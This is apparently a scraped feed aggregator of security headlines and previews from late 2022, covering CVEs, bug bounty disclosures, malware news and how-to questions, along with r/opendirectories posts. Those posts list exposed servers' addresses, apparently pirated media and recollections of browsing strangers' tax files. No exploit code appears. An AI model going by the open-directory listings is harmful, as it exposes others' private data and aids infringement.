    I have a 3TB HDD & a 500GB SSD, the latter of which contains my OS. While attempting to reinstall Windows, I accidentally clicked Delete on a partition on this drive. I installed Windows onto my HDD instead to avoid interfering with the SSD as much as possible, but it is now inaccessible. My BIOS & Disk Manager can see it, but the only portion of it that appears in File Explorer is a 104MB "System Reserved" drive. I removed the SSD from the SATA connect & have it connected via a USB enclosure. I then ran EaseUS' file recovery on the drive (on what the software identifies as Lost Partition -1) and it appears to be finding files, but I'm not sure where to go from here. Is there a way to begin reaccessing the partition or will I need a tool to copy all the files from the SSD onto my HDD? Any help would be greatly appreciated. submitted by /u/tauraje [link] [comments]
  • Open

    Firing 8 Account Takeover Methods
    No content preview
    Kerberos: The Ticket Authentication Protocol
    No content preview
  • Open

    Firing 8 Account Takeover Methods
    No content preview
    Kerberos: The Ticket Authentication Protocol
    No content preview
  • Open

    Firing 8 Account Takeover Methods
    No content preview
    Kerberos: The Ticket Authentication Protocol
    No content preview
  • Open

    SecWiki News 2022-10-21 Review
    Python pickle反序列化浅析 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-21 Review
    Python pickle反序列化浅析 by ourren 更多最新文章,请访问SecWiki
  • Open

    Link...
    What I do with sites like this is just rip the vids... Link... ​ Lots of vids mansplaining topics... ​ Come on are you guilty of mansplaining... Link... Doxing funny, why meeeeeeeeeeeee,eeeeeE. submitted by /u/xanderTgreat [link] [comments]
  • Open

    Trends in Web Threats: Old Web Skimmer Still Active Today
    We examine trends in web threats for the first quarter of 2022, including an old web skimmer that is still active five years later. The post Trends in Web Threats: Old Web Skimmer Still Active Today appeared first on Unit 42.
  • Open

    Telegram search engines…
    Telegram is a repository with a huge amount of data (perhaps already more massive than torrents). Smart people have come up with special… Continue reading on Medium »
  • Open

    [Stream] Modern Binary/Patch Diffing!
    submitted by /u/soupcreamychicken [link] [comments]
    Arm exploitation resources
    Hello, i need some resources for learning arm exploitation. I already looked into azeria labs. Does anyone have any other articles or books to suggest? submitted by /u/Greedy-Resolve-4811 [link] [comments]
  • Open

    Cloudgoat AWS CTF solution- Scenerio 6 (ec2_ssrf)
    Scenario: ec2_ssrf Continue reading on Medium »
  • Open

    逐鹿年度优秀安全解决方案 | 「WitAwards中国网安行业2022年度评选」火热进行时
    滴水成河,积沙成塔,快为你心仪的方案助力!
    为强化软件供应链安全,谷歌启动GUAC开源项目
    10月20日,Google宣布正在为名为GUAC的开源项目寻找感兴趣的贡献者,以此进一步强化软件供应链安全。
    FreeBuf周报 | 微软被曝可能泄露2.4TB客户敏感数据;俄罗斯对保加利亚发起网络攻击
    我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    黑客使用新版 FurBall Android 恶意软件监视伊朗公民
    “国内小猫”(Domestic Kitten)的伊朗攻击者正在进行一项新的恶意活动。
  • Open

    How to get experience with cobalt strike
    How are you realistically supposed to use cobalt strike in training scenarios and get familiar with it? Buy a personal license? Does work have to help you out there or just practice on the job? Also, how illegal is it to own the cracked version for home lab use? submitted by /u/knock_on_wood_yall [link] [comments]

  • Open

    SHA-3 Buffer Overflow - CVE-2022-37454
    submitted by /u/Gallus [link] [comments]
    Log4J-scan update: Detection for Apache Commons Text RCE (CVE-2022-42889)
    submitted by /u/mazen160 [link] [comments]
    Open Source drop - Evil OIDC Server for SSRF testing from Doyensec. Helpful for testers and bug bounty.
    submitted by /u/ds_at [link] [comments]
    Reverse Engineering the Apple MultiPeer Connectivity Framework
    submitted by /u/juken [link] [comments]
    Expanding (even further) on UUIDv1 Security Issues
    submitted by /u/csanders_ [link] [comments]
    Untangling Azure Active Directory Principals & Access Permissions
    submitted by /u/0xcsandker [link] [comments]
    Fantastic Rootkits: And Where to Find Them (Part 1)
    submitted by /u/jat0369 [link] [comments]
  • Open

    POOL_UPGRADE request handler may allow an unauthenticated attacker to remotely execute code on every node in the network.
    Hyperledger disclosed a bug submitted by shakedreiner: https://hackerone.com/reports/1705717 - Bounty: $2000
    Removed user can still view comments on the file/documents.
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1335070 - Bounty: $750
    Ability to View Non-Permitted Admin Log
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1533220 - Bounty: $500
    [CSRF] No Csrf protection against sending invitation to join the team.
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/728199 - Bounty: $1000
  • Open

    A Fringe Digital Reborn
    I started Fringe Digital in 2021 as a transitionary entrepreneurial project to pick-up where I was leaving off from a career in technology… Continue reading on Medium »
    Pakistan CNIC Information
    Note: this is all public data and for educational purposes only. i haven't used any illegal way to out source any data given in this blog… Continue reading on Medium »
  • Open

    Open FTP, accidental and irresponsibly open
    I was inspired by https://www.reddit.com/r/opendirectories/comments/y8d6jv/why_are_open_directories_dying/ This is a story of OD and how I only entered them once. And a fluke once in a life time OD find. A few years ago I was a white hat teacher of cyber security. I'd use NapalmFtp as my primary fishing pole to find OD. Back then many people most definitely would not want their home ftp server exposed. They were open by default. I ran scans to see who made the hardware...but i forget. I would hit a server once and never connect to it again. Tax returns were common. South American companies left their systems open most often. One day I just entered the Spanish word for flower into Napalm. Basically I just wanted a random seed, not a search for 2009 Taxes.pdf etc. I did find an OD ftp…
    Link...
    So open directories running out... Link... Not been through all, but took what I wanted, Which brings the question, Do you keep all the data off directories ?... Or is that just me... Nice stack of drives on a shelf... submitted by /u/xanderTgreat [link] [comments]
    fauux neocities index
    http://cs.gettysburg.edu/~duncjo01/archive/patterns/lain/ submitted by /u/Better_Base8805 [link] [comments]
  • Open

    New Vault Alert: Welcome PhononDAO
    We are excited to welcome PhononDAO to the Hats ecosystem! This unique partnership will take part in two steps; starting with a short term… Continue reading on Medium »
    Finding P1 Vulnerabilities: Tools & Resources
    The second, more in-depth part of ‘Finding P1 Vulnerabilities: A Step by Step Guide’. Continue reading on The Gray Area »
    Google VRP — [Insecure Direct Object Reference] $3133.70
    Hi All!!!, Yes… it’s me. As usual I want to give a story about how I find IDOR [Insecure Direct Object Reference] vulnerability on one of… Continue reading on Medium »
    HTTP request smuggling Explained and Exploited Part 0x2
    Hi! My name is Hashar Mujahid, and today we will continue to discuss what HTTP request smuggling vulnerabilities are and how we can… Continue reading on InfoSec Write-ups »
    Detecting Log4j & its Remediation
    This article is dedicated to log4j and how it’s being exploited in the wild by attackers. Continue reading on Medium »
    Smaller dalfox guide
    There is nothing special in it, just a simple and short guide on how to use dalfox professionally. Continue reading on Medium »
    Don't use Dalfox for Automated XSS
    If you are reading this, you are using dalfox or wanted to, for finding XSS automatically. Continue reading on Medium »
  • Open

    SecWiki News 2022-10-20 Review
    Response中所隐藏的杀机---揭秘响应中所存在的脆弱点 by 蓝色淡风 MiraclePtr UAF 漏洞利用缓解技术介绍 by 路人甲 浅谈硬编码密码及其扫描工具 by 路人甲 利用 CodeQL 分析 fastjson 1.2.80 利用链 by 路人甲 woodpecker-framwork-release: 高危漏洞精准检测与深度利用框架 by 路人甲 Fuzzing的研究之旅 by ourren 2022年数据安全市场报告 by ourren 如何绕过 JA3 指纹校验? by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-20 Review
    Response中所隐藏的杀机---揭秘响应中所存在的脆弱点 by 蓝色淡风 MiraclePtr UAF 漏洞利用缓解技术介绍 by 路人甲 浅谈硬编码密码及其扫描工具 by 路人甲 利用 CodeQL 分析 fastjson 1.2.80 利用链 by 路人甲 woodpecker-framwork-release: 高危漏洞精准检测与深度利用框架 by 路人甲 Fuzzing的研究之旅 by ourren 2022年数据安全市场报告 by ourren 如何绕过 JA3 指纹校验? by ourren 更多最新文章,请访问SecWiki
  • Open

    The Curious Case of the Password Database
    Nowadays, password managers are king. We use password managers to secure our most sensitive credentials to a myriad of services and sites; a compromise of the password manager could prove devastating. Due to recently disclosed critical Common Vulnerabilities and Exposures (CVEs) involving ManageEngine’s Password Manager Pro software, a client came to us at TrustedSec, wondering:... The post The Curious Case of the Password Database appeared first on TrustedSec.
  • Open

    TEXT4Shell PoC (CVE-2022–42889)
    No content preview
    Pylirt — Python Linux Incident Response Toolkit
    No content preview
    JSON Web Tokens
    No content preview
    HTTP request smuggling Explained and Exploited Part 0x2
    No content preview
  • Open

    TEXT4Shell PoC (CVE-2022–42889)
    No content preview
    Pylirt — Python Linux Incident Response Toolkit
    No content preview
    JSON Web Tokens
    No content preview
    HTTP request smuggling Explained and Exploited Part 0x2
    No content preview
  • Open

    TEXT4Shell PoC (CVE-2022–42889)
    No content preview
    Pylirt — Python Linux Incident Response Toolkit
    No content preview
    JSON Web Tokens
    No content preview
    HTTP request smuggling Explained and Exploited Part 0x2
    No content preview
  • Open

    First Pentest — help?
    Hi, so. I might be able to pentest a website (small company) if I get the OK from their higher-ups. At the risk of sounding stupid (sorry), am I missing anything? I dont want to get into legal trouble, since this isnt labs, so I'm a bit nervous and want to double check. Rules of engagement, including details about scope, time, etc. Pentest authorization document, including explicit written consent from 3rd parties like domain host. Contract...? I dont know how I'd make this work since this is completely remote... I dont sign contracts over the internet often so I've no idea. Maybe DocuSign? NDA I think. submitted by /u/ferachrine [link] [comments]
    Noob trying to understand RID's in broad terms
    Security Identifiers are issued by a security identifier authority. This might be the local system account, or might be a domain controller. Two SID's are issued to identify an account on a domain joined computer. A local SID, and one in active directory. In order to ensure the SID for every object in the relevant scope/domain is unique (I use the term scope to indicate the local computer system, rather than active directory), a Relative Identifier is issued. So my question is why not just use a RID in whichever scope? (Or why not ensure SID's are not duplicated within whichever scope?) Are everything-but-the-RID portion of SID's shared between scopes or something? (I have searched this on several occasions and the technicality of the results quickly inhibits understanding the subject in the broad terms I need.) Thanks in advance for any help! submitted by /u/WhichKey1 [link] [comments]
  • Open

    谁是年度安全技术变革?|「WitAwards中国网安行业2022年度评选」火热进行中
    快来看看你支持的企业上榜了吗?
    Java安全基础(四)Java的反射机制
    今天更新一篇关于java反射机制的文章,初学Java安全,内容如有不恰当的地方,还请各位大佬指正。
    如何看待我国网络安全人才缺口矛盾 | FreeBuf甲方群话题讨论
    一边是人才紧缺的呼声高涨,一边却是急切地优化裁员,为何会出现这一看似矛盾的境况?
    Android逆向分析工具性能对比分析
    本文针对国内以及国外知名Android逆向工程工具进行横向评测。
    7 个步骤,保障医疗行业免受网络威胁!
    本文梳理了一些安全保障措施,希望能够为医疗行业网络安全建设带来一些帮助。
    FreeBuf早报 | 新型UEFI rootkit恶意软件BlackLotus曝光;Lapsus$团伙成员被捕
    2022 上半年中国 IT 安全服务市场厂商整体收入约为 12.25 亿美元。
    因配置错误,微软可能已泄露大量客户敏感数据
    错误配置可能导致未经身份验证的访问行为,从而暴露微软和客户之间某些业务文件、交易数据以及客户的个人信息。
    拨开俄乌网络战迷雾-网络空间测绘篇
    传统战争中,地图对战争的胜利起着重要的作用,网络战争更是如此,要想得到精准的网络地图,网络空间测绘是必要手段。
  • Open

    RedLine Stealer 恶意软件通过网络钓鱼页面传播
    作者:CybleBlogs 译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/10/14/online-file-converter-phishing-page-spreads-redline-stealer/ 用于交付有效负载的Windows快捷方式文件 今天,许多人之所以使用在线数字工具,仅仅是因为它们易于使用,并且它们为用户提供了一个有...
  • Open

    RedLine Stealer 恶意软件通过网络钓鱼页面传播
    作者:CybleBlogs 译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/10/14/online-file-converter-phishing-page-spreads-redline-stealer/ 用于交付有效负载的Windows快捷方式文件 今天,许多人之所以使用在线数字工具,仅仅是因为它们易于使用,并且它们为用户提供了一个有...
  • Open

    CVE-2022-1786 A Journey To The Dawn
    Article URL: https://blog.kylebot.net/2022/10/16/CVE-2022-1786/ Comments URL: https://news.ycombinator.com/item?id=33271476 Points: 1 # Comments: 0
  • Open

    Report Notes
    Mainly for those who perform IR but I welcome anyone to respond, what are you using for notes across a team?OneNote? Notion? Ghostwriter? Something else? submitted by /u/purpleteamer24 [link] [comments]

  • Open

    A framework for OAuth 2.0 device code authentication grant flow phishing
    submitted by /u/Acceptable-Doubt-878 [link] [comments]
    Telerik Revist - New Exploit Tool
    submitted by /u/aconite33 [link] [comments]
    HTTP/3 connection contamination: an upcoming threat
    submitted by /u/albinowax [link] [comments]
    Wireless Penetration Testing complete Repo
    submitted by /u/lutzenfried [link] [comments]
    Detecting and mitigating CVE-2022-42889 a.k.a. Text4shell
    submitted by /u/MiguelHzBz [link] [comments]
    Hara-Kirin: Dissecting the Privileged Components of Huawei Mobile Devices (Hexacon 2022)
    submitted by /u/M0t0k0Kus4n4g1 [link] [comments]
    Microsoft Office Online Server Remote Code Execution
    submitted by /u/gid0rah [link] [comments]
    The Danger of Falling to System Role in AWS SDK Client
    submitted by /u/nibblesec [link] [comments]
    CVE-2022-42889: Apache Commons Text prior to 1.10.0 allows RCE (CVSS9.8), aka "Text4Shell"
    submitted by /u/qwerty0x41 [link] [comments]
    Azure function to insert MISP data into Azure Sentinel
    submitted by /u/wez32 [link] [comments]
    A New Attack Surface on MS Exchange Part 4 - ProxyRelay
    submitted by /u/CyberMasterV [link] [comments]
    PHP filters chain: What is it and how to use it - convert almost any file inclusion to RCE
    submitted by /u/Gallus [link] [comments]
  • Open

    Why are open directories dying?
    Came late to the scene in 2016. There are a lot less ODs for TV than used to be. Why is that? DMCAs? submitted by /u/phollda [link] [comments]
    5 links...
    1 mix of images clips not engrish... Also is it a real open directory... https://kaatis.party/?C=S;O=D ​ 2 Just some gifs vrbangers... http://www.bokepvr.com/wp-content/uploads/2015/08/?C=S;O=D ​ 3 mp3's mp4's images https://mrbloaded.com/wp-content/uploads/ ​ 4 just images gif, check out, NEWS WTFF.gif, 5th of november... http://www.crucialbrutal.com/site_images/?S=D ​ 5 Some BDSM stuff... http://obeynikita.com/wp-content/uploads/2018/01/ ​ ​ Looking for the link to check what has been posted, to check this link... http://162.12.215.254/Data/ submitted by /u/xanderTgreat [link] [comments]
    Movies, TV Shows, Music, OS ISOs
    http://78.40.121.68:8080/ - Movies & TV Shows http://149.56.24.230:9002/ - TV Show (Bojack Horseman S01-S06) http://104.168.151.193/ - Posture/Neck videos, GBA BIOS, Yo-Kai Watch for 3DS http://139.196.159.145/ - Windows/Mac Software, Android APKs, IEEE docs http://nellyfan.org/indigo/ - Nelly Furtado Music, Software, Magazine scans http://djazmatic.com/Acapellas3/ - Music (vocals only) /Instrumentals3/ - Music (instrumentals only) /Mixtapes3/ - Music (mashups/mixes) http://www.themamaship.com/fp1/ - Music http://m3bd.net/m3bd/ - Music & "Design" http://dl.mytehranmusic.com/ghadimi/ - Music & Music Videos http://aircredits.net/thi/singles/ - Music (mashups) https://windy.fansub.ovh/decide/ - TV Shows, Movies, Sotware, Audio (JP/EN) http://148.251.123.40/ - OS ISOs, Software https://www.jacobsm.com/geedryve/ - Old TV, music, propaganda/memes http://78.203.154.250/ - Movies/TV Shows (FR) http://syn.org.au/app/uploads/ - Podcasts, Weird AU promo videos, TONS of images (warning: page may freeze if you try to visit via browser) http://video-cdn.simpletv.eu/video/ - Movies (RU/EN) http://www.flixtres.com/maria/ - Movies (SP) http://74.208.251.230/Contenido/ - Movies/TV Shows (SP) https://lipstickandmetal.com/ - Record scans/pictures submitted by /u/JasonSec [link] [comments]
  • Open

    Found vulnaribility on subdomain of nasa.gov simply using censys
    Hi, i have found low level vulnaribility on subdomain of nasa.gov simply using censys.At first i have used the process mentioned at my… Continue reading on Medium »
    Live subdomain enumeration using censys
    I have found a way to find live subdomains(it is not guaranteed to work on all the websites) using simple keywords in censys. Continue reading on Medium »
    23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite
    How I found Authentication Bypass >> File upload vulnerability >> Arbitrary File Overwrite and how I managed I found the path of the file… Continue reading on Medium »
    Scan QR Code and Got Hacked (CVE-2021–43530 : UXSS on Firefox Android Version)
    I. QR Code Continue reading on Medium »
    Firing 8 Account Takeover Methods
    Hello! this is Md Maruf Hosan a bug bounty hunter from Bangladesh. I am gonna be firing some account takeover methods Continue reading on Medium »
  • Open

    Mass Accounts Takeover Without any user Interaction at https://app.taxjar.com/
    Stripe disclosed a bug submitted by mr_asg: https://hackerone.com/reports/1685970 - Bounty: $13000
    Local applications from user's computer can listen for webhooks via insecure gRPC server from stripe-cli
    Stripe disclosed a bug submitted by gregxsunday: https://hackerone.com/reports/1369191 - Bounty: $500
    User information disclosed via API
    U.S. General Services Administration disclosed a bug submitted by toormund: https://hackerone.com/reports/1218461
    Bypassing domain deny_list rule in Smokescreen via double brackets [[]] which leads to SSRF
    Stripe disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1580495 - Bounty: $500
    Tomcat Servlet Examples accessible at https://44.240.33.83:38443 and https://52.36.56.155:38443
    Stripe disclosed a bug submitted by mustafa_farrag: https://hackerone.com/reports/1560149 - Bounty: $1500
    Fully TaxJar account control and ability to disclose and modify business account settings Due to Broken Access Control in /current_user_data
    Stripe disclosed a bug submitted by mr_asg: https://hackerone.com/reports/1677541 - Bounty: $1000
    IDOR able to buy a plan with lesser fee
    Automattic disclosed a bug submitted by ug0x01: https://hackerone.com/reports/1679276
    DOM XSS at `https://adobedocs.github.io/OAE_PartnerAPI/?configUrl={site}` due to outdated Swagger UI
    Adobe disclosed a bug submitted by dreamer_eh: https://hackerone.com/reports/1736378
  • Open

    which email would the reply be sent to?
    Hi everyone please let me know if more detail is needed or if this does not belong here I am currently working m57 jean case as an exercise for digital forensics class. I found this email but im unsure whether the reply would be sent to the return path or to the email that is being spoofed (tuckgeorge@gmail.com). Sorry if this is a noob question any advice would be appreciated. submitted by /u/Namibguy [link] [comments]
    A Detailed Analysis of the Gafgyt Malware Targeting IoT Devices [PDF]
    submitted by /u/CyberMasterV [link] [comments]
    USB forensics and timestomping
    I'm looking at this drive where a large amount of files are have the same 'last accessed' timestamp or it's within seconds of each other. I get logging into or restarting a system can do that to an extent but this seems to be more than that. MFT Explorer and Axiom Cyber have picked up some timestomping. What's the benefit of changing the last accessed stamp? Overall, I'm supposed to be looking for indicators that files were copied to an external drive. I've been checking shellbags, lnk files, browser activity. What are other artifacts to look at in USB copying cases? Any resources I could read up on? submitted by /u/Inevitable_Logging [link] [comments]
    Generate Linux Volatility Profile with the help of VMware vSphere, without running anything on the guest machine
    As you know, to generate a Linux volatility profile or symbols (for Volatility 3), specially if its a custom kernel, you need to run something on the target machine, such as compiling something using make. But sometimes it would be not possible, for example make/gcc not being available to compile. But if the Linux machine is a vSphere VM, Is there anyway to use vSphere to generate the profile/symbol required for volatility, without running anything in the Linux VM? I know that dumping memory is possible, but what about generating a profile/symbol? submitted by /u/Ro0o0otkit [link] [comments]
  • Open

    CVE-2022-41853: Potential Remote Code Execution Vulnerability in Hsqldb
    Article URL: https://www.code-intelligence.com/blog/potential-remote-code-execution-in-hsqldb Comments URL: https://news.ycombinator.com/item?id=33264105 Points: 2 # Comments: 0
    CVE-2022-42889 Explotation, Detection and Mitigation
    Article URL: https://sysdig.com/blog/cve-2022-42889-text4shell/ Comments URL: https://news.ycombinator.com/item?id=33263998 Points: 3 # Comments: 0
  • Open

    CVE-2022-41853: Potential Remote Code Execution Vulnerability in Hsqldb
    Article URL: https://www.code-intelligence.com/blog/potential-remote-code-execution-in-hsqldb Comments URL: https://news.ycombinator.com/item?id=33264105 Points: 2 # Comments: 0
  • Open

    SecWiki News 2022-10-19 Review
    代码审计web渗透 SRC资料大礼包,提取码加v:ms08076 by shuteer 常见的一些威胁情报分析平台 by shuteer 【安全练兵场】| BurpSuite靶场系列之身份验证 by shuteer 2020美亚杯个人赛复盘 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-19 Review
    代码审计web渗透 SRC资料大礼包,提取码加v:ms08076 by shuteer 常见的一些威胁情报分析平台 by shuteer 【安全练兵场】| BurpSuite靶场系列之身份验证 by shuteer 2020美亚杯个人赛复盘 by ourren 更多最新文章,请访问SecWiki
  • Open

    Challenge Crypto Osint Histoire
    Continue reading on Medium »
    Hello sir, your child got arrested doing drugs…!!
    This is how most people are falling prey to scams of mafia groups that make you believe that your child was arrested for doing drugs. When… Continue reading on Medium »
  • Open

    Four Steps to Prepare for a Ransomware Attack
    No content preview
    Reverse Engineering Function Call in C and Exploiting it
    Binary Exploitation of a Simple Function in C Continue reading on InfoSec Write-ups »
  • Open

    Four Steps to Prepare for a Ransomware Attack
    No content preview
    Reverse Engineering Function Call in C and Exploiting it
    Binary Exploitation of a Simple Function in C Continue reading on InfoSec Write-ups »
  • Open

    Four Steps to Prepare for a Ransomware Attack
    No content preview
    Reverse Engineering Function Call in C and Exploiting it
    Binary Exploitation of a Simple Function in C Continue reading on InfoSec Write-ups »
  • Open

    Writing Ransomware for VMWare ESXi
    I wanted to find some ransomware samples for VMware ESXi. I didn't find any, so I decided to write my own. I was shocked at how ridiculously easy this was. I made a video showing how to do this in 33 lines of python. Hopefully, this will help further detection of these kinds of threats. Check it out! Writing Ransomware for ESXi submitted by /u/Infosecsamurai [link] [comments]
    Microsoft Office Online Server Remote Code Execution
    submitted by /u/gid0rah [link] [comments]
  • Open

    实战打靶之Noter
    靶机主要是从信息收集开始,发现是flask搭建的,然后使用flask unsign进行解密,暴力破解。
    萌新学习零信任
    面对日益增加的内网攻击威胁,一些模糊了边界,窃取信任的攻击层出不穷。
    FreeBuf早报 | 德国网络安全负责人涉嫌“通俄”被解雇;Kakao CEO宣布辞职
    德国内政部长解雇了网络安全负责人Arne Schönbohm,他面临通过行业协会德国网络安全委员会与俄罗斯安全服务机构有联系的指控。
    年度创新安全产品花落谁家 |「WitAwards中国网安行业2022年度评选」火热进行中
    快动动小手指,助力心仪的网络安全创新产品“出道“吧。
    2022年全球白帽常用工具排行榜TOP 10
    几十年来,攻击方、白帽和安全从业者的工具不断演进,成为网络安全长河中最具技术特色的灯塔。
    在美国申请减免学生贷款?当心落入网络诈骗者圈套
    美国学生贷款减免计划已于10月17日正式开放免费申请,目前已有超过800万人提交了减免还款申请。
    31 名嫌疑人因使用无钥匙入侵技术盗取汽车,在欧洲被捕
    31人因利用无钥匙入侵技术偷窃汽车在欧洲被捕。
  • Open

    What plugins do you recommend for ExploitDev or RE and why?
    Which plugins make life easier for you? For Windbg , IDA pro , Ghidra and ... submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Are the DVWA 'impossible' levels possible to crack?
    I've been trying to crack the File Upload section on impossible difficulty and, well, it seems impossible. I cannot find a solution anywhere, and I'm not asking for a solution here, I just want to know if it's possible or not. Thanks! submitted by /u/simplyheinz [link] [comments]
    Why is SANS Technology Institute or sans.edu not recognized by usnews.com.
    Why is SANS Technology Institute or sans.edu not recognized by usnews.com. This question is killing me and I can't find a answer. I am looking into apply for a masters degree. submitted by /u/Sufficient-Gap-8480 [link] [comments]
  • Open

    CVE-2022-26138 Confluence Server 硬编码漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/HRqWtQh1q1R--NDIlHLCMA 漏洞描述 7月21日,Atlassian官方发布了2022年7月的安全更新,其中涉及到Confluence Server的多个漏洞,其中CVE-2022-26138为一个硬编码漏洞。 当Confluence Server或Data Cen...
  • Open

    CVE-2022-26138 Confluence Server 硬编码漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/HRqWtQh1q1R--NDIlHLCMA 漏洞描述 7月21日,Atlassian官方发布了2022年7月的安全更新,其中涉及到Confluence Server的多个漏洞,其中CVE-2022-26138为一个硬编码漏洞。 当Confluence Server或Data Cen...
  • Open

    Data Collection
    During IR engagements, like many other analysts, I've seen different means of data exfiltration. During one engagement, the customer stated that they'd "...shut off all of our FTP servers...", but apparently "all" meant something different to them, because the threat actor found an FTP server that hadn't been shut off and used it to first transfer files out of the infrastructure to that server, and then from the server to another location. This approach may have been taken due to the threat actor discovering some modicum of monitoring going on within the infrastructure, and possibly being aware that FTP traffic going to a known IP address would not be flagged as suspicious or malicious. During another incident, we saw the threat actor archive collected files and move them to an Internet-ac…

  • Open

    Decentralized, private and anonymous comms tech
    I know of some apps/systems that enable/support 1 or 2 of the 3 requirements but NOT ALL 3: Decentralized: no central authority not central servers are needed to support the operation. It's totally distributed. Private: the content shared on this platform is encrypted. Anonymous: from the outside, it's impossible to know who's sending messages to who I've also read thesis about systems like this but I couldn't find any LIVE system that ticks all these 3 boxes. Ideas? Suggestions? Thank you submitted by /u/iambrunocoelho [link] [comments]
    Defenders beware: A case for post-ransomware investigations
    submitted by /u/SCI_Rusher [link] [comments]
    New to cybersecurity
    I want to become a pentester. I’ve done a ton of research in regards to certification and ctf’s before posting on here. I do not want to get a degree in computer science so please any info to a noob would be greatly appreciated that would be an alternative route/path to be able to get a job. Give me your opinion on how I should get started. I’m wiping an old laptop I have to use for Linux and practice coding but I know nothing of Linux or anything else to this regard. Treat me like you would someone who knows nothing about cybersecurity. Thank you. submitted by /u/WHATTHEPHOBIA [link] [comments]
  • Open

    Jetstack Paranoia: A New Open Source Tool for Container Image Security
    submitted by /u/sanitybit [link] [comments]
    Enrich Splunk events with Steampipe
    submitted by /u/sanitybit [link] [comments]
    Our new scanner for Text4Shell
    submitted by /u/dn3t [link] [comments]
    Introducing fine-grained personal access tokens for GitHub
    submitted by /u/0x414141 [link] [comments]
    Defenders beware: A case for post-ransomware investigations
    submitted by /u/SCI_Rusher [link] [comments]
    Opening the doors and windows 0-click RCE on the Tesla Model3
    submitted by /u/jeandrew [link] [comments]
    CVE-2022-42889 (Text4Shell) OSS detector - Finds possibly vulnerable JAR files
    submitted by /u/SRMish3 [link] [comments]
    A Detailed Analysis of the Gafgyt Malware Targeting IoT Devices [PDF]
    submitted by /u/CyberMasterV [link] [comments]
    Recovering Web Tokens From Office
    submitted by /u/gid0rah [link] [comments]
  • Open

    Users Without Permission Can Download Restricted Files
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/794904 - Bounty: $500
    Sub-Dept User Can Add User's To Main Department.
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/890209 - Bounty: $500
    Access to private file's of helpdesk.
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/804534 - Bounty: $500
    TikTok Account Creation Date Information Disclosure
    TikTok disclosed a bug submitted by f15: https://hackerone.com/reports/1562020 - Bounty: $100
    CVE-2017-5929: Hyperledger - Arbitrary Deserialization of Untrusted Data
    Hyperledger disclosed a bug submitted by mik-patient: https://hackerone.com/reports/1739099
    XSS in www.shopify.com/markets?utm_source=
    Shopify disclosed a bug submitted by noblesix: https://hackerone.com/reports/1699762 - Bounty: $500
  • Open

    Return HackTheBox Walkthrough
    Return is a Windows machine on HTB and is rated as easy, this box is designed over windows that have Weak Service Permission. If summarized, The post Return HackTheBox Walkthrough appeared first on Hacking Articles.
    Return HackTheBox Walkthrough
    Return is a Windows machine on HTB and is rated as easy, this box is designed over windows that have Weak Service Permission. If summarized, The post Return HackTheBox Walkthrough appeared first on Hacking Articles.
  • Open

    What is the UK going rate for cybersecurity professionals?
    Hi I remember someone posting the average UK salaries that cybersecurity professionals earn I think back in 2021. Just curious to know what the going rates are in the UK for security engineers and analysts that have up to 3 years experience Thanks submitted by /u/securm0n [link] [comments]
    Scheduled or Random Internal Penetration Tests?
    In my current environment, I get random alerts of a brute force happening on a ton of my networking equipment. The IT SecOps team has previously mentioned that they moved from a scheduled model to a random model to better simulate an actual penetration and/or attack. My concern with this is that now I know significantly less about what is them performing a test, and what is an actual threat trying to break into the equipment. Is there an expected level of transparency, or am I meant to be in the dark about when these are happening? How can I best distinguish a test from an actual attacker? submitted by /u/MikeDeansMustard [link] [comments]
    Hardware fingerprinting capabilities of Electron apps?
    We know that web browsers can fingeprint individual hardware by noticing imperfections with aide of WebGL, Canvas, etc. Given that Electron app is a Chromium under the hood, could it do the same? Or inject something like fb.com/fp.js on the page? Is there any controls which could affect these capabilities? E.g. command line parameters, MAC restrictions and CSP settings? And as a side question, could fingerprinting be affected by restricting app's access to /sys/ with a MAC? Or it's solely in the hands of the graphics driver? submitted by /u/nobodysu [link] [comments]
    Breaking in to Cybersec industry
    Does anyone have any insights on breaking into Cyber? I'm a new grad with B.S. in Cybersecurity and am currently studying for Security+, and AWS Practitioner Certs - also freshening up on python and SQL. Any and all comments are appreciated! submitted by /u/EatsButtALOT [link] [comments]
  • Open

    time lapse videos of construction
    https://157.158.62.96/ submitted by /u/dasheswithdots [link] [comments]
    Some classical music. Beethoven, Chopen, Pachelbel's canon in D
    http://104.236.12.144/audio/ Since this collection contains Pachelbel's canon in d, I have to post this video. submitted by /u/HGMIV926 [link] [comments]
    Random search...
    Small xxx clips http://www.indiepornrevolution.com/indie-porn/wp-content/uploads/html5encodes/ ​ Images http://www.thisisrnb.com/wp-content/gallery/ ​ Found this searching for VOD. some mp4... https://media.assembly.org/vod/ ​ Posted this on the other side... Some funny stuff... https://elsmar.com/pdf_files/ ​ Strange vids & pics bit like the site S*** J***... https://www.2raw4tv.com/video/picture/?C=S;O=D ​ 5 links... submitted by /u/xanderTgreat [link] [comments]
    [NSFW] Movies, TV Shows, eBooks, Recipes
